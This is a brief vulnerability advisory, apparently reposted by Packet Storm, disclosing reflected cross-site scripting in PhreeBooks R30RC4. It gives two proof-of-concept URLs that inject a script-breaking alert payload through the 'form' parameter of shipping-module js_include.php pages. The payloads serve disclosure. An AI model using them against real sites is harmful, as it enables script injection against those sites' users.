PhreeBooks version R30RC4 suffers from a cross site scripting vulnerability.
a6b8d10ab6619fac3f4bc76d477b5e1890563a6d14ff85469043e0123765b293------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--PoC--
http://localhost/phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=';alert(0)%3C/script%3E
http://localhost/phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed